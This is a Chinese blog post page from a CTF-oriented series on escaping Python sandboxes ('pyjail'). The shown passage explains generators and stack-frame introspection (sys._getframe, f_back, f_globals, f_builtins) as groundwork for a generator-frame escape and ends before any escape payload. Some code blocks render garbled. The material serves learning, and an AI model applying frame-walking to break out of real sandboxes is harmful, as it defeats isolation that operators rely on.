  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="pyjail bypass-11 利用生成器栈逃逸" />
<meta property="og:locale" content="en" />
<meta name="description" content="pyjail 沙箱逃逸原理 绕过删除模块或方法 绕过基于字符串匹配的过滤 绕过命名空间限制 绕过多行限制 绕过长度限制 变量覆盖与函数篡改 绕过 audit hook 绕过 AST 沙箱 绕过输出限制 绕过 opcode 沙箱 利用生成器栈" />
<meta property="og:description" content="pyjail 沙箱逃逸原理 绕过删除模块或方法 绕过基于字符串匹配的过滤 绕过命名空间限制 绕过多行限制 绕过长度限制 变量覆盖与函数篡改 绕过 audit hook 绕过 AST 沙箱 绕过输出限制 绕过 opcode 沙箱 利用生成器栈" />
<link rel="canonical" href="/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/" />
<meta property="og:url" content="/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/" />
<meta property="og:site_name" content="DummyKitty’s Blog" />
<meta property="og:image" content="/assets/images/pyjail.jpg" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-11-09T14:23:57+00:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="/assets/images/pyjail.jpg" />
<meta property="twitter:title" content="pyjail bypass-11 利用生成器栈逃逸" />
<meta name="twitter:site" content="@DummyKitty" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2025-04-02T00:46:04+00:00","datePublished":"2024-11-09T14:23:57+00:00","description":"pyjail 沙箱逃逸原理 绕过删除模块或方法 绕过基于字符串匹配的过滤 绕过命名空间限制 绕过多行限制 绕过长度限制 变量覆盖与函数篡改 绕过 audit hook 绕过 AST 沙箱 绕过输出限制 绕过 opcode 沙箱 利用生成器栈","headline":"pyjail bypass-11 利用生成器栈逃逸","image":"/assets/images/pyjail.jpg","mainEntityOfPage":{"@type":"WebPage","@id":"/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/"},"url":"/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/"}</script>
<!-- End Jekyll SEO tag -->

  <title>pyjail bypass-11 利用生成器栈逃逸 | DummyKitty's Blog
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->

<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="DummyKitty's Blog">
<meta name="application-name" content="DummyKitty's Blog">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">

  <!-- Resource Hints -->
  
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
  <!-- Bootstrap -->
  
  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  
  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->

<!-- layout specified -->

    <!-- image lazy-loading & popup & clipboard -->
    
  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>

<script defer src="/assets/js/dist/post.min.js"></script>

<!-- Pageviews -->

    <!-- PWA -->
    
      <script
        defer
        src="/app.min.js?baseurl=&register=true"
      ></script>
    
    <!-- Web Analytics -->
    
  <!-- A placeholder to allow defining custom metadata -->

</head>

  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/images/me.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">DummyKitty's Blog</a>
    <p class="site-subtitle fst-italic mb-0">Code Audit@xxx / Penetration Tester@xxx / CTFer</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            
            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            
            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            
            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            
            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    
        <a
          href="https://github.com/DummyKitty"
          aria-label="github"
          
            target="_blank"
            
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
        <a
          href="/feed.xml"
          aria-label="rss"
          
        >
          <i class="fas fa-rss"></i>
        </a>
      
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->

    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      
            <span>
              <a href="/">Home</a>
            </span>

              <span>pyjail bypass-11 利用生成器栈逃逸</span>
            
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>

        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->

<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->

<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->

<!-- Change the icon of checkbox -->

<!-- Handle images -->

    <!-- take out classes -->
    
    <!-- lazy-load images -->
    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      
        <!-- create the image wrapper -->
        
    <!-- combine -->
    
<!-- Add header for code snippets -->

<!-- Create heading anchors -->

<!-- return -->

<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>pyjail bypass-11 利用生成器栈逃逸</h1>
    
    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1731162237"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Nov  9, 2024
</time>

      </span>

      <!-- lastmod date -->
      
        <span>
          Updated
          <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1743554764"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Apr  2, 2025
</time>

        </span>
      
        <div class="mt-3 mb-3">
          <a href="/assets/images/pyjail.jpg" class="popup img-link preview-img shimmer"><img src="/assets/images/pyjail.jpg"  alt="Preview Image" width="1200" height="630"  loading="lazy"></a></div>
      
      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          
          By

          <em>
            
              <a href="https://twitter.com/DummyKitty">DummyKitty</a>
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          
          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->

<!-- words per minute -->

<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="2817 words"
>
  <em>15 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">pyjail bypass-11 利用生成器栈逃逸</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">pyjail bypass-11 利用生成器栈逃逸</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  
  <div class="content">
    <blockquote>
  <ul>
    <li><a href="/posts/python-沙箱逃逸原理/">pyjail 沙箱逃逸原理</a></li>
    <li><a href="/posts/pyjail-bypass-01-绕过删除模块或方法/">绕过删除模块或方法</a></li>
    <li><a href="/posts/pyjail-bypass-02-字符串变换绕过/">绕过基于字符串匹配的过滤</a></li>
    <li><a href="/posts/pyjail-bypass-03-绕过命名空间限制/">绕过命名空间限制</a></li>
    <li><a href="/posts/pyjail-bypass-05-绕过长度限制/">绕过多行限制</a></li>
    <li><a href="/posts/pyjail-bypass-04-绕过多行限制/">绕过长度限制</a></li>
    <li><a href="/posts/pyjail-bypass-06-变量覆盖与函数篡改/">变量覆盖与函数篡改</a></li>
    <li><a href="/posts/pyjail-bypass-07-绕过-audit-hook/">绕过 audit hook</a></li>
    <li><a href="/posts/pyjail-bypass-08-绕过-AST-沙箱/">绕过 AST 沙箱</a></li>
    <li><a href="/posts/pyjail-bypass-09-绕过输出限制/">绕过输出限制</a></li>
    <li><a href="/posts/pyjail-bypass-10-绕过-opcode-沙箱/">绕过 opcode 沙箱</a></li>
    <li><a href="/posts/pyjail-bypass-11-利用生成器栈/">利用生成器栈</a></li>
  </ul>
</blockquote>

<p>本文仅作为个人学习记录，大部分参考自下面的文章，讲解得非常细致：</p>
<ul>
  <li><a href="https://pid-blog.com/article/frame-escape-pyjail#%E9%A2%98%E8%A7%A3%EF%BC%9Amossfern">利用生成器栈帧逃逸 Pyjail - CISCN 2024 mossfern 题解</a></li>
</ul>

<h2 id="利用生成器栈帧进行逃逸"><span class="me-2">利用生成器栈帧进行逃逸</span><a href="#利用生成器栈帧进行逃逸" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<h3 id="生成器"><span class="me-2">生成器</span><a href="#生成器" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>在 Python 中，生成器（Generator）是一种特殊的迭代器，它能够逐个生成值，而不需要一次性将所有值存储在内存中。生成器的主要特点是它们能够 惰性计算，即按需生成数据，这使得它们在处理大量数据或无限序列时非常高效。</p>

<p>生成器通过使用 yield 关键字来返回值，而不是像普通函数那样使用 return。当一个函数包含 yield 时，它就成为了一个生成器函数。调用这个函数不会立即执行，而是返回一个生成器对象。每次调用生成器对象的 next() 方法时，函数会从上次暂停的地方继续执行，直到再次遇到 yield 或结束。</p>
<h4 id="创建生成器"><span class="me-2">创建生成器</span><a href="#创建生成器" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>创建生成器有以下两种方法：</p>
<ol>
  <li>使用 yield 关键字
    <div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td><td class="rouge-code"><pre> <span class="k">def</span> <span class="nf">my_generator</span><span class="p">():</span>
     <span class="k">yield</span> <span class="mi">1</span>
     <span class="k">yield</span> <span class="mi">2</span>
     <span class="k">yield</span> <span class="mi">3</span>

 <span class="n">gen</span> <span class="o">=</span> <span class="nf">my_generator</span><span class="p">()</span>
 <span class="nf">print</span><span class="p">(</span><span class="nf">type</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span> <span class="c1"># &lt;class 'generator'&gt;
</span> <span class="nf">print</span><span class="p">(</span><span class="n">gen</span><span class="p">)</span>       <span class="c1"># &lt;generator object my_generator at 0x7f4a20e049e0&gt;
</span>
 <span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 1
</span> <span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 2
</span> <span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 3
</span></pre></td></tr></tbody></table></code></div>    </div>
  </li>
  <li>使用生成器表达式。类似于列表推导式，但使用小括号 () 而不是方括号 [] 来创建生成器表达式。
    <div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre> <span class="n">gen_exp</span> <span class="o">=</span> <span class="p">(</span><span class="n">x</span> <span class="o">*</span> <span class="n">x</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">5</span><span class="p">))</span>

 <span class="k">for</span> <span class="n">num</span> <span class="ow">in</span> <span class="n">gen_exp</span><span class="p">:</span>
     <span class="nf">print</span><span class="p">(</span><span class="n">num</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div>    </div>
    <h4 id="生成器转化为列表"><span class="me-2">生成器转化为列表</span><a href="#生成器转化为列表" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
    <p>生成器转换为列表可以使用如下的几种方式：</p>
  </li>
  <li>list 构造函数</li>
  <li>列表推导式</li>
  <li><code class="language-plaintext highlighter-rouge">*</code> 解包操作符
```py
gen = (x for x in range(5))<br />
lst = list(gen)</li>
</ol>

<p>gen = (x for x in range(5))<br />
lst = [x for x in gen]</p>

<p>gen = (x for x in range(5))<br />
lst = [*gen]</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre>

### 栈帧
在 Python 中，栈帧（Stack Frame）是每次函数调用时创建的执行上下文。每个栈帧包含了函数的局部变量、参数、返回地址等信息，并且这些栈帧按照调用顺序被压入 调用栈（Call Stack）中。

#### 获取栈帧
获取栈帧的基本方法是使用 sys._getframe 方法：
```py
import sys
f1 = sys._getframe()
print(f1)
# &lt;frame at 0x7fb8d49984a0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack.py', line 3, code &lt;module&gt;&gt;
print(type(f1)) # &lt;class 'frame'&gt;
</pre></td></tr></tbody></table></code></div></div>
<p>f1 就是一个栈帧对象。</p>

<p>另一种方法是用 inspect 库的 currentframe 方法</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">inspect</span>
<span class="n">f2</span> <span class="o">=</span> <span class="n">inspect</span><span class="p">.</span><span class="nf">currentframe</span><span class="p">()</span>
</pre></td></tr></tbody></table></code></div></div>
<h4 id="交互式命令行的差异"><span class="me-2">交互式命令行的差异</span><a href="#交互式命令行的差异" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>注意，由于 Python 交互式命令行在执行代码时会使用单独的栈帧，因此下面的代码在交互式命令行与脚本文件中执行的结果不同。</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre><span class="o">&gt;&gt;&gt;</span> <span class="kn">import</span> <span class="n">sys</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">f1</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">f2</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">f1</span> <span class="o">==</span> <span class="n">f2</span>
<span class="bp">False</span>
</pre></td></tr></tbody></table></code></div></div>
<p>直接执行脚本文件时返回 True</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>
<span class="n">f1</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="nf">print</span><span class="p">(</span><span class="n">f1</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="nf">type</span><span class="p">(</span><span class="n">f1</span><span class="p">))</span>
<span class="n">f2</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="nf">print</span><span class="p">(</span><span class="n">f1</span> <span class="o">==</span> <span class="n">f2</span><span class="p">)</span> <span class="c1"># True
</span></pre></td></tr></tbody></table></code></div></div>
<h4 id="栈帧工作原理"><span class="me-2">栈帧工作原理</span><a href="#栈帧工作原理" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>栈帧的工作原理如下：</p>
<ol>
  <li>当程序开始执行时，会创建一个==全局帧（global frame）==，它是整个程序的顶层上下文。</li>
  <li>每当==调用一个函数时，Python 会创建一个新的栈帧，并将其压入调用栈顶部==。</li>
  <li>==当函数完成执行后，当前栈帧会被弹出，并将控制权返回给上一个栈帧==。</li>
  <li>这种过程持续进行，直到所有函数都执行完毕，最终回到全局帧。</li>
</ol>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>
<span class="n">frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">global frame: </span><span class="si">{</span><span class="n">frame</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
    <span class="n">frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">add() frame: </span><span class="si">{</span><span class="n">frame</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">a</span> <span class="o">+</span> <span class="n">b</span>

<span class="k">def</span> <span class="nf">multiply</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">):</span>
    <span class="n">frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">multiply() frame: </span><span class="si">{</span><span class="n">frame</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">return</span> <span class="nf">add</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span> <span class="o">*</span> <span class="n">y</span>

<span class="n">result</span> <span class="o">=</span> <span class="nf">multiply</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Result: </span><span class="si">{</span><span class="n">result</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

<span class="c1"># global frame: &lt;frame at 0x7f5793d5a400, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_1.py', line 3, code &lt;module&gt;&gt;
# multiply() frame: &lt;frame at 0x7f5793d35480, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_1.py', line 11, code multiply&gt;
# add() frame: &lt;frame at 0x7f5793d34940, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_1.py', line 6, code add&gt;
</span></pre></td></tr></tbody></table></code></div></div>

<h4 id="栈帧的内容"><span class="me-2">栈帧的内容</span><a href="#栈帧的内容" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>使用 dir 查看栈帧的内容：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre></td><td class="rouge-code"><pre><span class="nf">dir</span><span class="p">(</span><span class="n">f1</span><span class="p">)</span>
<span class="c1"># ['__class__',
#  '__delattr__',
#  '__dir__',
#  '__doc__',
#  '__eq__',
#  '__format__',
#  '__subclasshook__',
#  ...
#  'clear',
#  'f_back',
#  'f_builtins',
#  'f_code',
#  'f_globals',
#  'f_lasti',
#  'f_lineno',
#  'f_locals',
#  'f_trace',
#  'f_trace_lines',
#  'f_trace_opcodes']
</span></pre></td></tr></tbody></table></code></div></div>
<p>除了 Object 共有的属性之外，有一些 f_ 开头的属性是栈帧对象独有的。</p>
<ul>
  <li>f_back：它是指向上一个栈帧的指针。在 Python 中，f1.f_back 拿到的也是一个栈帧对象。</li>
  <li>f_builtins、f_globals、f_locals：对应着当前栈帧的 builtins、globals、locals 对象。</li>
</ul>

<p>我们可以使用前面的脚本进行测试：</p>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>
<span class="n">global_frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="n">multiply_frame</span> <span class="o">=</span> <span class="bp">None</span>
<span class="n">add_frame</span> <span class="o">=</span> <span class="bp">None</span>
<span class="c1"># print(f"global frame: {global_frame}")
</span><span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
    <span class="n">add_frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="c1"># print(f"add() frame: {frame}")
</span>    <span class="nf">print</span><span class="p">(</span><span class="n">multiply_frame</span> <span class="o">==</span> <span class="n">add_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">a</span> <span class="o">+</span> <span class="n">b</span>

<span class="k">def</span> <span class="nf">multiply</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">multiply_frame</span>
    <span class="n">multiply_frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="c1"># print(f"multiply() frame: {frame}")
</span>    <span class="nf">print</span><span class="p">(</span><span class="n">global_frame</span> <span class="o">==</span> <span class="n">multiply_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">)</span>
    <span class="k">return</span> <span class="nf">add</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span> <span class="o">*</span> <span class="n">y</span>

<span class="n">result</span> <span class="o">=</span> <span class="nf">multiply</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Result: </span><span class="si">{</span><span class="n">result</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

<span class="c1"># True
# True
# Result: 15
</span></pre></td></tr></tbody></table></code></div></div>

<h3 id="生成器的栈帧"><span class="me-2">生成器的栈帧</span><a href="#生成器的栈帧" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

